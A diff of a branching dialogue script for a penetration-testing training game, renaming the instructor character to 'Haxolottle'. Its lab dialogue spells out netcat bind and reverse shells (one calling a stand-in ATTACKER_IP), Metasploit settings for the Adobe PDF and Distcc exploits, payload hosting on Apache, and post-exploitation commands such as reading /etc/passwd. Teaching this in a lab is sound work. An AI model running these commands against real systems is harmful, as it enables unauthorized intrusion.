Instructor: After setting your options, run "check" to see if the target appears vulnerable. + Haxolottle: After setting your options, run "check" to see if the target appears vulnerable. - Penetration Testing Instructor: Not all exploits support this, and it's not 100% reliable, but it's worth trying. + Haxolottle: Not all exploits support this, and it's not 100% reliable, but it's worth trying. - Penetration Testing Instructor: For Distcc specifically, the check function isn't supported, but trying it doesn't hurt. + Haxolottle: For Distcc specifically, the check function isn't supported, but trying it doesn't hurt. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What level of access do I get?] - Penetration Testing Instructor: With Distcc, you typically get user-level access as the "distccd" user. + Haxolottle: With Distcc, you typically get user-level access as the "distccd" user. - Penetration Testing Instructor: You won't have root (administrator) access initially, but you can access anything that user can access. + Haxolottle: You won't have root (administrator) access initially, but you can access anything that user can access. - Penetration Testing Instructor: From there, you might attempt privilege escalation to gain root access, which is often the ultimate goal on Unix systems. + Haxolottle: From there, you might attempt privilege escalation to gain root access, which is often the ultimate goal on Unix systems. - Penetration Testing Instructor: Even without root, a compromised user account can cause significant damage. + Haxolottle: Even without root, a compromised user account can cause significant damage. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How can I make the shell more usable?] - Penetration Testing Instructor: The initial shell from cmd/unix/reverse is quite basic. You can upgrade it to an interactive shell: + Haxolottle: The initial shell from cmd/unix/reverse is quite basic. You can upgrade it to an interactive shell: - Penetration Testing Instructor: Run: python -c 'import pty; pty.spawn("/bin/bash")' + Haxolottle: Run: python -c 'import pty; pty.spawn("/bin/bash")' - Penetration Testing Instructor: This spawns a proper bash shell with better command line editing and behavior. + Haxolottle: This spawns a proper bash shell with better command line editing and behavior. - Penetration Testing Instructor: Then you'll have a more normal feeling shell prompt to work with. + Haxolottle: Then you'll have a more normal feeling shell prompt to work with. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> vulnerability_hub === commands_reference === -Penetration Testing Instructor: Let me give you a comprehensive commands reference for this lab. +Haxolottle: Let me give you a comprehensive commands reference for this lab. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Penetration Testing Instructor: **Listing Metasploit Payloads:** +Haxolottle: **Listing Metasploit Payloads:** -Penetration Testing Instructor: msfvenom -l payload | less +Haxolottle: msfvenom -l payload | less -Penetration Testing Instructor: **Bind Shell Simulation with Netcat:** +Haxolottle: **Bind Shell Simulation with Netcat:** -Penetration Testing Instructor: On victim: nc.exe -l -p 31337 -e cmd.exe -vv +Haxolottle: On victim: nc.exe -l -p 31337 -e cmd.exe -vv -Penetration Testing Instructor: On attacker: nc VICTIM_IP 31337 +Haxolottle: On attacker: nc VICTIM_IP 31337 + [Show me reverse shell commands] - Penetration Testing Instructor: **Reverse Shell with Netcat:** + Haxolottle: **Reverse Shell with Netcat:** - Penetration Testing Instructor: On attacker: nc -l -p 53 -vv + Haxolottle: On attacker: nc -l -p 53 -vv - Penetration Testing Instructor: On victim: nc.exe ATTACKER_IP 53 -e cmd.exe -vv + Haxolottle: On victim: nc.exe ATTACKER_IP 53 -e cmd.exe -vv - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 + [Show me msfconsole basics] - Penetration Testing Instructor: **Msfconsole Basics:** + Haxolottle: **Msfconsole Basics:** - Penetration Testing Instructor: Start console: msfconsole + Haxolottle: Start console: msfconsole - Penetration Testing Instructor: Get help: help + Haxolottle: Get help: help - Penetration Testing Instructor: List exploits: show exploits + Haxolottle: List exploits: show exploits - Penetration Testing Instructor: List payloads: show payloads + Haxolottle: List payloads: show payloads - Penetration Testing Instructor: Get exploit info: info exploit/path/to/exploit + Haxolottle: Get exploit info: info exploit/path/to/exploit - Penetration Testing Instructor: Select exploit: use exploit/path/to/exploit + Haxolottle: Select exploit: use exploit/path/to/exploit - Penetration Testing Instructor: Show options: show options + Haxolottle: Show options: show options - Penetration Testing Instructor: Set option: set OPTION_NAME value + Haxolottle: Set option: set OPTION_NAME value - Penetration Testing Instructor: Go back: back + Haxolottle: Go back: back - Penetration Testing Instructor: Run exploit: exploit or run + Haxolottle: Run exploit: exploit or run - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 + [Show me the Adobe PDF exploit commands] - Penetration Testing Instructor: **Adobe PDF Exploit (CVE-2010-1240):** + Haxolottle: **Adobe PDF Exploit (CVE-2010-1240):** - Penetration Testing Instructor: use exploit/windows/fileformat/adobe_pdf_embedded_exe + Haxolottle: use exploit/windows/fileformat/adobe_pdf_embedded_exe - Penetration Testing Instructor: set FILENAME timetable.pdf + Haxolottle: set FILENAME timetable.pdf - Penetration Testing Instructor: set PAYLOAD windows/shell/reverse_tcp + Haxolottle: set PAYLOAD windows/shell/reverse_tcp - Penetration Testing Instructor: set LHOST YOUR_KALI_IP + Haxolottle: set LHOST YOUR_KALI_IP - Penetration Testing Instructor: set LPORT 4444 + Haxolottle: set LPORT 4444 - Penetration Testing Instructor: run + Haxolottle: run - Penetration Testing Instructor: **Set up handler:** + Haxolottle: **Set up handler:** - Penetration Testing Instructor: use exploit/multi/handler + Haxolottle: use exploit/multi/handler - Penetration Testing Instructor: set payload windows/meterpreter/reverse_tcp + Haxolottle: set payload windows/meterpreter/reverse_tcp - Penetration Testing Instructor: set LHOST YOUR_KALI_IP + Haxolottle: set LHOST YOUR_KALI_IP - Penetration Testing Instructor: set LPORT 4444 + Haxolottle: set LPORT 4444 - Penetration Testing Instructor: run + Haxolottle: run - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 + [Show me the Distcc exploit commands] - Penetration Testing Instructor: **Distcc Remote Exploit (CVE-2004-2687):** + Haxolottle: **Distcc Remote Exploit (CVE-2004-2687):** - Penetration Testing Instructor: use exploit/unix/misc/distcc_exec + Haxolottle: use exploit/unix/misc/distcc_exec - Penetration Testing Instructor: set RHOST VICTIM_IP + Haxolottle: set RHOST VICTIM_IP - Penetration Testing Instructor: set PAYLOAD cmd/unix/reverse + Haxolottle: set PAYLOAD cmd/unix/reverse - Penetration Testing Instructor: set LHOST YOUR_KALI_IP + Haxolottle: set LHOST YOUR_KALI_IP - Penetration Testing Instructor: set LPORT 4444 + Haxolottle: set LPORT 4444 - Penetration Testing Instructor: check (to see if target is vulnerable) + Haxolottle: check (to see if target is vulnerable) - Penetration Testing Instructor: exploit + Haxolottle: exploit - Penetration Testing Instructor: **Upgrade to interactive shell:** + Haxolottle: **Upgrade to interactive shell:** - Penetration Testing Instructor: python -c 'import pty; pty.spawn("/bin/bash")' + Haxolottle: python -c 'import pty; pty.spawn("/bin/bash")' - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 + [Show me web server setup for hosting payloads] - Penetration Testing Instructor: **Web Server Setup:** + Haxolottle: **Web Server Setup:** - Penetration Testing Instructor: Create share directory: sudo mkdir /var/www/html/share + Haxolottle: Create share directory: sudo mkdir /var/www/html/share - Penetration Testing Instructor: Copy payload: sudo cp /home/kali/.msf4/local/filename.pdf /var/www/html/share/ + Haxolottle: Copy payload: sudo cp /home/kali/.msf4/local/filename.pdf /var/www/html/share/ - Penetration Testing Instructor: Start Apache: sudo service apache2 start + Haxolottle: Start Apache: sudo service apache2 start - Penetration Testing Instructor: Access from victim: http://KALI_IP/share/filename.pdf + Haxolottle: Access from victim: http://KALI_IP/share/filename.pdf - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 + [Show me useful post-exploitation commands] - Penetration Testing Instructor: **Post-Exploitation Commands:** + Haxolottle: **Post-Exploitation Commands:** - Penetration Testing Instructor: Windows: whoami, dir, net user, ipconfig, systeminfo + Haxolottle: Windows: whoami, dir, net user, ipconfig, systeminfo - Penetration Testing Instructor: Linux: whoami, ls -la, uname -a, ifconfig, cat /etc/passwd + Haxolottle: Linux: whoami, ls -la, uname -a, ifconfig, cat /etc/passwd - Penetration Testing Instructor: Navigate: cd DIRECTORY + Haxolottle: Navigate: cd DIRECTORY - Penetration Testing Instructor: Create file: echo TEXT > filename.txt + Haxolottle: Create file: echo TEXT > filename.txt - Penetration Testing Instructor: Open browser (Windows): explorer "https://example.com" + Haxolottle: Open browser (Windows): explorer "https://example.com" - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 + [Show me how to find network IPs] - Penetration Testing Instructor: **Finding IP Addresses:** + Haxolottle: **Finding IP Addresses:** - Penetration Testing Instructor: On Kali: ifconfig or hostname -I + Haxolottle: On Kali: ifconfig or hostname -I - Penetration Testing Instructor: On Windows: ipconfig + Haxolottle: On Windows: ipconfig - Penetration Testing Instructor: Note the host-only network interfaces that start with the same 3 octets. + Haxolottle: Note the host-only network interfaces that start with the same 3 octets. - ~ instructor_rapport += 3 - -- -> vulnerability_hub - -=== challenge_tips === -Penetration Testing Instructor: Let me give you some practical tips for succeeding in the challenge. - -~ instructor_rapport += 5 - -Penetration Testing Instructor: **For the Adobe PDF exploit:** - -Penetration Testing Instructor: Make sure you set up the handler BEFORE the victim opens the PDF. The reverse shell will try to connect immediately. - -Penetration Testing Instructor: The LHOST and LPORT must match between the PDF generation and the handler. - -Penetration Testing Instructor: On Windows, use Adobe Reader specifically, not Chrome's built-in PDF viewer, since we're exploiting Adobe Reader's vulnerability. - -+ [What if the PDF exploit doesn't work?] - Penetration Testing Instructor: First, check that Windows firewall isn't blocking the connection. Usually it won't block outbound connections, but double-check. - - Penetration Testing Instructor: Verify your IP addresses are correct - use the host-only network addresses that start with the same three octets. - - Penetration Testing Instructor: Make sure your handler is actually running when the victim opens the PDF. - - Penetration Testing Instructor: Check that you're opening with Adobe Reader, not another PDF viewer. - - ~ instructor_rapport += 5 - -+ [Tips for the Distcc exploit?] - Penetration Testing Instructor: The Linux victim VM is the server running Distcc. You can't open it directly - that's expected. - - Penetration Testing Instructor: The IP address typically ends in .3 and starts with the same three octets as your Kali and Windows VMs. - - Penetration Testing Instructor: After you get shell access, remember you can upgrade to an interactive shell with that Python one-liner. - - Penetration Testing Instructor: Look in the distccd user's home directory for the flag file. - - ~ instructor_rapport += 5 - -+ [General troubleshooting advice?] - Penetration Testing Instructor: Always double-check your IP addresses. Getting the wrong IP is the most common mistake. - - Penetration Testing Instructor: Pay attention to whether you need LHOST (local host - your Kali IP) or RHOST (remote host - victim IP). - - Penetration Testing Instructor: If something doesn't work, run "show options" again to verify all settings before running the exploit. - - Penetration Testing Instructor: Use ifconfig to check your Kali IP and ipconfig to check Windows IP. - - ~ instructor_rapport += 5 - -+ [What should I do once I have shell access?] - Penetration Testing Instructor: First, verify you have access by running basic commands like "whoami" and "dir" or "ls". - - Penetration Testing Instructor: Navigate to the user's home directory and look for flag files. - - Penetration Testing Instructor: For the PDF exploit, the flag might be on the Desktop or in the user's home folder. - - Penetration Testing Instructor: For Distcc, look in /home for user directories, then search for flag files. - - Penetration Testing Instructor: Read the flag with "cat flag" or "type flag" on Windows. - - ~ instructor_rapport += 5 - -- -> vulnerability_hub - -=== ready_for_practice === -Penetration Testing Instructor: Excellent! You're ready to start the practical exercises. - -~ instructor_rapport += 10 -~ exploitation_ethics += 10 - -Penetration Testing Instructor: Remember: the knowledge you've gained about vulnerabilities and exploitation is powerful. Use it only for authorized security testing, penetration testing engagements, and defensive purposes. - -Penetration Testing Instructor: Understanding how attacks work makes you a better defender. But wielding these tools without authorization is both illegal and unethical. - -Penetration Testing Instructor: In the lab environment, you'll practice both local exploits (the Adobe PDF vulnerability) and remote exploits (the Distcc vulnerability). - -+ [Any final advice before I start?] - Penetration Testing Instructor: Take your time and read the error messages carefully. Metasploit is verbose and will tell you what went wrong. - - Penetration Testing Instructor: Use tab completion and command history to work more efficiently. - - Penetration Testing Instructor: Document what you're doing as you go - it helps with troubleshooting and writing reports later. - - Penetration Testing Instructor: Most importantly: if you get stuck, check "show options" to verify your settings, and make sure your IP addresses are correct. - - Penetration Testing Instructor: Good luck, Agent {player_name}. This is where theory meets practice. - - ~ instructor_rapport += 10 + ~ haxolottle_rapport += 3 - -> vulnerability_hub